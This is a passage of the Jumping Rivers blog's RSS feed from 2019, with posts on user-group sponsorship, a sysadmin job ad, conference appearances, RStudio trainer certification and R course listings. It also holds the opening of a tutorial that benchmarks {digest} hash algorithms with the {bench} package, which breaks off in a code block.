Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2019-sponsorship-satrdays-and-user-groups"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="user--r-ladies-groups"&gt;useR / R-Ladies Groups&lt;/h3&gt;
&lt;p&gt;Now that we&amp;rsquo;ve tested the water with SatRday sponsorship, we thought we would do the same with useR groups. Due the large numbers of useR groups, there are over &lt;a href="https://jumpingrivers.github.io/meetingsR/" rel="external"&gt;400&lt;/a&gt;, we can&amp;rsquo;t open this up to the world (sorry). To start with we plan on offering sponsorship to twenty groups from Europe. Hopefully, we can increase this number.&lt;/p&gt;
&lt;p&gt;So if you want sponsorship for your group, just complete this &lt;a href="https://www.jumpingrivers.com/q/sponsorship/" rel="external"&gt;quick form&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/sponsorship-satrdays-and-user-groups/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Job: Junior Systems Administrator (with a focus on R/Python)</title><link>https://www.jumpingrivers.com/blog/job-junior-systems-administrator-with-a-focus-on-r-python/</link><pubDate>Thu, 17 Oct 2019 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/job-junior-systems-administrator-with-a-focus-on-r-python/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/job-junior-systems-administrator-with-a-focus-on-r-python/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/job-junior-systems-administrator-with-a-focus-on-r-python/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;&lt;a href="https://www.jumpingrivers.com" rel="external" title="Jumping Rivers"&gt;Jumping Rivers&lt;/a&gt; is a data science consultancy company focused on R and Python. We work across industries and throughout the world. We offer a mixture of training, modelling, and infrastructure support. Jumping Rivers is an &lt;a href="https://www.jumpingrivers.com/posit/" rel="external" title="Posit Full Service Certified Partner"&gt;Posit Full Service Certified Partner&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;This role is suitable for anyone interested in deploying (Linux-based) data science services and contains two main elements:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Client facing:&lt;/strong&gt; assess virtual servers &amp;amp; services. Identify potential issues or improvements.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Internal:&lt;/strong&gt; Everyone(!) at Jumping Rivers uses Linux. Provide support on setting-up systems.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Depending on the interests of the applicant, getting involved with training is also a possibility.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Location:&lt;/strong&gt; Jumping Rivers is based in &lt;a href="https://en.wikipedia.org/wiki/Newcastle_upon_Tyne" rel="external" title="Newcastle upon Tyne"&gt;Newcastle upon Tyne&lt;/a&gt;. However, half of the team are remote (Leeds, Lancaster, Edinburgh). To make remote working a possibility, you need a) a good internet connection and b) within a few hours of (train) travel to London or Edinburgh.&lt;/p&gt;
&lt;h3 id="essential-technical-requirements"&gt;Essential technical requirements&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Linux server administration&lt;/li&gt;
&lt;li&gt;Shell scripting&lt;/li&gt;
&lt;li&gt;Version control&lt;/li&gt;
&lt;li&gt;Relevant technical degree or equivalent experience (Sciences, server administration)&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="bonus"&gt;Bonus&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Experience with R, Python, HTML/CSS/JS&lt;/li&gt;
&lt;li&gt;Docker stack deployment (e.g., Docker Compose, Terraform, Packer)&lt;/li&gt;
&lt;li&gt;Continuous Integration and Deployment (e.g., GitLab CI, Travis)&lt;/li&gt;
&lt;li&gt;Authentication services (e.g., Active Directory, SAML, LDAP, OAuth)&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="individual-responsibilities"&gt;Individual responsibilities&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Time management&lt;/li&gt;
&lt;li&gt;Communication (video chat and email)&lt;/li&gt;
&lt;li&gt;Travel to client’s location as required&lt;/li&gt;
&lt;li&gt;Work independently&lt;/li&gt;
&lt;li&gt;Work as part of a team&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="future-role-opportunities"&gt;Future role opportunities&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Opportunity to develop new orchestration and deployment pipelines for use in Artificial Intelligence and Machine Learning workloads.&lt;/li&gt;
&lt;li&gt;Maintaining remote Linux services both cloud-based and internal VPS&lt;/li&gt;
&lt;li&gt;Designing bespoke infrastructure solutions clients&lt;/li&gt;
&lt;li&gt;Training: develop and deliver courses&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;To discuss this role, please email us at &lt;a href="mailto:careers@jumpingrivers.com" rel="external"&gt;careers@jumpingrivers.com&lt;/a&gt; . To apply, please send a short covering letter and CV. Please use &amp;ldquo;Junior Systems Administrator&amp;rdquo; as the subject.&lt;/p&gt;
&lt;p&gt;Closing date: 14th November&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/job-junior-systems-administrator-with-a-focus-on-r-python/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Catch us at these conferences!</title><link>https://www.jumpingrivers.com/blog/catch-us-at-these-conferences/</link><pubDate>Mon, 09 Sep 2019 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/catch-us-at-these-conferences/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/catch-us-at-these-conferences/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/catch-us-at-these-conferences/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;At Jumping Rivers we&amp;rsquo;re always to want to branch into the data science community, and so this year we&amp;rsquo;re going to quite a few conferences in the autumn. You can catch us at:&lt;/p&gt;
&lt;h3 id="gss-government-statistical-service-conference---edinburgh"&gt;GSS (Government Statistical Service) Conference - Edinburgh&lt;/h3&gt;
&lt;p&gt;From the 1-2 October, our very own &lt;em&gt;Esther Gillespie&lt;/em&gt; (CEO) and &lt;em&gt;Seb Mellor&lt;/em&gt; (Data Engineer) will be attending the GSS conference in Edinburgh. If you see them, feel free to chat or ask for some merch! Unfortunately, there are no tickets available for this one.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2019-catch-us-at-these-conferences"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="earl---london"&gt;EARL - London&lt;/h3&gt;
&lt;p&gt;EARL London boasts a very strong line up of speakers, from Sainsbury&amp;rsquo;s to Stack Overflow. We&amp;rsquo;re sponsorsing this one so expect a big Jumping Rivers presence. We&amp;rsquo;ve got Esther, &lt;em&gt;Colin Gillespie&lt;/em&gt; (Project Manager) and &lt;em&gt;Rhian Davies&lt;/em&gt; (Data Scientist) attending.&lt;/p&gt;
&lt;p&gt;From the 10-12 September you&amp;rsquo;ll be able to catch them 3 heading up our stall, where you can pop by for a chat about or for a coaster!&lt;/p&gt;
&lt;p&gt;If you&amp;rsquo;ve still not grabbed yourself a &lt;a href="https://earlconf.com/#tickets" rel="external"&gt;ticket&lt;/a&gt;, you&amp;rsquo;ll have to do it pretty soon!&lt;/p&gt;
&lt;h3 id="why-r---warsaw"&gt;Why R? - Warsaw&lt;/h3&gt;
&lt;p&gt;In just a couple of weeks time, Jumping Rivers will be going international! Four of our team will be crossing borders into Warsaw for the annual &lt;a href="http://whyr.pl/2019/" rel="external"&gt;Why R?&lt;/a&gt; conference. If you like the sound of it, grab yourself &lt;a href="https://evenea.pl/event/whyr2019/?lang=en" rel="external"&gt;a ticket&lt;/a&gt;!&lt;/p&gt;
&lt;p&gt;Who&amp;rsquo;s going? Myself (&lt;em&gt;Theo Roe&lt;/em&gt;, Data Scientist), Colin, &lt;em&gt;Roman Popat&lt;/em&gt; (Data Scientist) and &lt;em&gt;Jack Walton&lt;/em&gt; (Data Scientist) will be attending. If you see us feel free to stop us for a chat, and grab one of infamous Jumping Rivers coasters!&lt;/p&gt;
&lt;p&gt;As a treat, I&amp;rsquo;m doing a workshop on Friday morning titled &lt;em&gt;&lt;strong&gt;&amp;ldquo;Shiny basics&amp;rdquo;&lt;/strong&gt;&lt;/em&gt;. I&amp;rsquo;m also talking in the 10-11:20am Saturday &lt;strong&gt;Shiny&lt;/strong&gt; session about a recent project we took on at Jumping Rivers, titled &lt;em&gt;Improving the communication of environmental data using &lt;strong&gt;Shiny&lt;/strong&gt;&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;You can catch Colin talking in the Sunday 15:05-16:05pm &lt;strong&gt;Vision 1&lt;/strong&gt; session. His talk is titled &lt;em&gt;Hacking R as a script kiddie&lt;/em&gt;. This is about the relatively easy hacks that can be performed to access systems, as data science moves away from local machines to the cloud.&lt;/p&gt;
&lt;p&gt;Thanks, and hope to see you there!&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/catch-us-at-these-conferences/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>We're RStudio Trainers!</title><link>https://www.jumpingrivers.com/blog/rstudio-certified-trainers/</link><pubDate>Fri, 16 Aug 2019 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/rstudio-certified-trainers/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/rstudio-certified-trainers/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/rstudio-certified-trainers/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;h1 id="were-rstudio-trainers"&gt;We&amp;rsquo;re RStudio Trainers!&lt;/h1&gt;
&lt;p&gt;Big news. RStudio recently started certifying trainers in three areas: the tidyverse, Shiny and teaching. To be certified to teach a topic you have to pass the exam for that topic and the teaching exam.&lt;/p&gt;
&lt;p&gt;Even &lt;strong&gt;&lt;em&gt;bigger&lt;/em&gt;&lt;/strong&gt; news. Four of your lovely Jumping Rivers trainers are now certified to teach at least one topic! Check out the &lt;a href="https://rstd.io/trainers" rel="external" title="RStudio certified trainers page"&gt;RStudio certified trainers page&lt;/a&gt; to see me (Theo Roe), Rhian Davies, Colin Gillespie and Roman Popat in action!&lt;/p&gt;
&lt;p&gt;P.S. whilst we&amp;rsquo;ve got you, if you want to learn the tidyverse or shiny see
&lt;img class="image-center" src="small-RStudio-logos-Shiny.jpg" style="width:300px; class:image-center"&gt;&lt;/p&gt;
&lt;img class="image-center" src="tidyverse-logo.png" style="width:300px; class:image-center"&gt;
&lt;img class="image-center" src="rstudio-logo.png" style="width:300px; class:image-center"&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/rstudio-certified-trainers/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Upcoming R courses with Jumping Rivers</title><link>https://www.jumpingrivers.com/blog/upcoming-r-courses-with-jumping-rivers/</link><pubDate>Sun, 04 Aug 2019 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/upcoming-r-courses-with-jumping-rivers/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/upcoming-r-courses-with-jumping-rivers/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/upcoming-r-courses-with-jumping-rivers/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;You&amp;rsquo;ll be pleased to know that Jumping rivers are running R training courses up and down the UK, in London, Newcastle, Belfast and Edinburgh. I&amp;rsquo;ve put together a quick summary of the courses available through til the end of the year. They are sorted by place then date. You can find the booking links and more detail over at &lt;a href="https://www.jumpingrivers.com/training/public/" rel="external"&gt;our courses page.&lt;/a&gt; Don&amp;rsquo;t be afraid to get in contact if you have any questions!&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2019-london-uk-r-courses"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="london"&gt;London&lt;/h2&gt;
&lt;h3 id="1212---advanced-programming-in-r"&gt;12/12 - Advanced Programming in R&lt;/h3&gt;
&lt;p&gt;This is a two-day intensive course on advanced R programming. The training course will not only cover advanced R programming techniques, such as S3/S4 objects, reference classes and function closures, we will spend a significant time discussing why and where these methods are used. The course will be a mixture of lectures and computer practicals. By the end of the course, participants will be able to use OOP within there own code.&lt;/p&gt;
&lt;h2 id="newcastle"&gt;Newcastle&lt;/h2&gt;
&lt;h3 id="212---412---rapid-reporting-for-analysts-an-introduction-to-r-programming-through-to-reporting-in-three-days"&gt;2/12 - 4/12 - Rapid reporting for analysts: An Introduction to R programming through to reporting in three days&lt;/h3&gt;
&lt;p&gt;This course aims to take each individual through the fundamental approach to using R programming in her current role. Ensuring that the attendees build confidence on where and how to start when they get back to their desks. By the end of the course the individual should have already introduced some automation and will be working towards automating all of their reports. Our experience shows analysts who set up a reproducible report save between 20-80% time on their task&lt;/p&gt;
&lt;h2 id="belfast"&gt;Belfast&lt;/h2&gt;
&lt;h3 id="29---mastering-the-tidyverse-data-carpentry"&gt;2/9 - Mastering the Tidyverse (Data Carpentry)&lt;/h3&gt;
&lt;p&gt;The {tidyverse} is essential for any statistician or data scientist who deals with data on a day-to-day basis. By focusing on small key tasks, the {tidyverse} suite of packages removes the pain of data manipulation. The {tidyverse} allows you to&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Import data from databases and data sources with ease&lt;/li&gt;
&lt;li&gt;Remove the pain of data cleaning&lt;/li&gt;
&lt;li&gt;Start understanding that data by transforming it, visualising it with imagery and modelling it&lt;/li&gt;
&lt;li&gt;Communicate your findings throughout your organisation securely and simply with apps, documents or plots&lt;/li&gt;
&lt;li&gt;Make business decisions based on accurate data&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This training course covers key aspects of the {tidyverse}, including {dplyr}, {lubridate}, {tidyr}, {stringr} and tibbles.&lt;/p&gt;
&lt;h3 id="39---intro-to-r"&gt;3/9 - Intro to R&lt;/h3&gt;
&lt;p&gt;This is a one-day intensive course on R and assumes no prior knowledge. By the end of the course, participants will be able to import, summarise and plot their data. At each step, we avoid using &amp;ldquo;magic code&amp;rdquo;, and stress the importance of understanding what R is doing.&lt;/p&gt;
&lt;h2 id="edinburgh"&gt;Edinburgh&lt;/h2&gt;
&lt;h3 id="410---intro-to-r"&gt;4/10 - Intro to R&lt;/h3&gt;
&lt;p&gt;See above description&lt;/p&gt;
&lt;h3 id="1110---programming-with-r"&gt;11/10 - Programming with R&lt;/h3&gt;
&lt;p&gt;The benefit of using a programming language such as R is that we can automate repetitive tasks. This course covers the fundamental techniques such as functions, for loops and conditional expressions. By the end of this course, you will understand what these techniques are and when to use them. This is a one-day intensive course on R.&lt;/p&gt;
&lt;h3 id="1810---introduction-to-r"&gt;18/10 - Introduction to R&lt;/h3&gt;
&lt;p&gt;See above description&lt;/p&gt;
&lt;h3 id="2510---mastering-the-tidyverse-data-carpentry"&gt;25/10 - Mastering the Tidyverse (Data Carpentry)&lt;/h3&gt;
&lt;p&gt;See above description&lt;/p&gt;
&lt;h3 id="111---advanced-graphics-with-r"&gt;1/11 - Advanced Graphics with R&lt;/h3&gt;
&lt;p&gt;This is a one-day intensive course on advanced graphics with R. The standard plotting commands in R are known as the base graphics, but are starting to show their age. In this course, we cover more advanced graphics packages - in particular, {ggplot2}. The {ggplot2} package can create advanced and informative graphics. This training course stresses understanding - not just one off R scripts. By the end of the session, participants will be familiar with themes, scales and facets, as well as the wider {ggplot2} world of packages.&lt;/p&gt;
&lt;h3 id="811---statistical-modelling-with-r"&gt;8/11 - Statistical Modelling with R&lt;/h3&gt;
&lt;p&gt;From the very beginning, R was designed for statistical modelling. Out of the box, R makes standard statistical techniques easy. This course covers the fundamental modelling techniques. We begin the day by revising hypotheses tests, before moving on to ANVOA tables and regression analysis. The class ends by looking at more sophisticated methods such as clustering and principal components analysis (PCA).&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/upcoming-r-courses-with-jumping-rivers/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Timing hash functions with the bench package</title><link>https://www.jumpingrivers.com/blog/digest-timings-bench-package/</link><pubDate>Tue, 21 May 2019 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/digest-timings-bench-package/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/digest-timings-bench-package/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/digest-timings-bench-package/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This blog post has two goals&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Investigate the {bench} package for timing R functions&lt;/li&gt;
&lt;li&gt;Consequently explore the different algorithms in the {digest} package using {bench}&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="what-is-digest"&gt;What is {digest}?&lt;/h3&gt;
&lt;p&gt;The &lt;a href="http://dirk.eddelbuettel.com/code/digest.html" rel="external"&gt;{digest}&lt;/a&gt; package provides a hash function to summarise R objects. Standard hashes are available, such as md5, crc32, sha-1, and sha-256.&lt;/p&gt;
&lt;p&gt;The key function in the package is &lt;code&gt;digest()&lt;/code&gt; that applies a cryptographical hash function to arbitrary R objects. By default, the objects are internally serialized using &lt;code&gt;md5&lt;/code&gt;. For example,&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;digest&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;digest&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;1234&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] &amp;#34;37c3db57937cc950b924e1dccb76f051&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;digest&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;1234&lt;/span&gt;, algo &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;sha256&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] &amp;#34;01b3680722a3f3a3094c9845956b6b8eba07f0b938e6a0238ed62b8b4065b538&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The {digest} package is fairly popular and has a large number of reverse dependencies&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;length&lt;/span&gt;(tools&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;package_dependencies&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;digest&amp;#34;&lt;/span&gt;, reverse &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;)&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;digest)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] 186&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The number of available hashing algorithms has grown over the years, and as a little side project, we decided to test the speed of the various algorithms. To be clear, I’m not considering any security aspects or the potential of hash clashes, just pure speed.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2019-digest-timings-bench-package"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="timing-in-r"&gt;Timing in R&lt;/h3&gt;
&lt;p&gt;There are numerous ways of &lt;a href="https://www.jumpingrivers.com/blog/timing-in-r/"&gt;timing R&lt;/a&gt; functions. A recent addition to this list is the &lt;a href="https://cran.r-project.org/web/packages/bench/" rel="external"&gt;{bench}&lt;/a&gt; package. The main function &lt;a href="https://github.com/r-lib/bench#features" rel="external"&gt;bench::mark()&lt;/a&gt; has a number of useful features over other timing functions.&lt;/p&gt;
&lt;p&gt;To time and compare two functions, we load the relevant packages&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;bench&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;digest&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;tidyverse&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;then we call the &lt;code&gt;mark()&lt;/code&gt; function and compare the &lt;code&gt;md5&lt;/code&gt; with the &lt;code&gt;sha1&lt;/code&gt; hash&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;value &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1234&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;mark&lt;/span&gt;(check &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;FALSE&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; md5 &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;digest&lt;/span&gt;(value, algo &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;md5&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; sha1 &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;digest&lt;/span&gt;(value, algo &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;sha256&amp;#34;&lt;/span&gt;)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;select&lt;/span&gt;(expression, median)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 2 x 2&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## expression median&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;bch:expr&amp;gt; &amp;lt;bch:tm&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 md5 50.2µs&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 sha1 50.9µs&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The resulting &lt;code&gt;tibble&lt;/code&gt; object, contains all the timing information. For simplicity, we&amp;rsquo;ve just selected the expression and median time.&lt;/p&gt;
&lt;h3 id="more-advanced-bench"&gt;More advanced {bench}&lt;/h3&gt;
&lt;p&gt;Of course, it’s more likely that you’ll want to compare more than two things. You can compare as many function calls as you want with &lt;code&gt;mark()&lt;/code&gt;, as we’ll demonstrate in the following example. It’s probably more likely that you’ll want to compare these function calls against more than one value. For example, in the {digest} package there are eight different algorithms. Ranging from the standard &lt;code&gt;md5&lt;/code&gt; to the newer &lt;code&gt;xxhash64&lt;/code&gt; methods. To compare times, we’ll generate &lt;code&gt;n = 20&lt;/code&gt; random character strings of length &lt;code&gt;N = 10,000&lt;/code&gt;. This can all be wrapped up in the single function &lt;code&gt;press()&lt;/code&gt; function call from the {bench} package:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;N &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1e4&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;results &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;suppressMessages&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; bench&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;press&lt;/span&gt;(
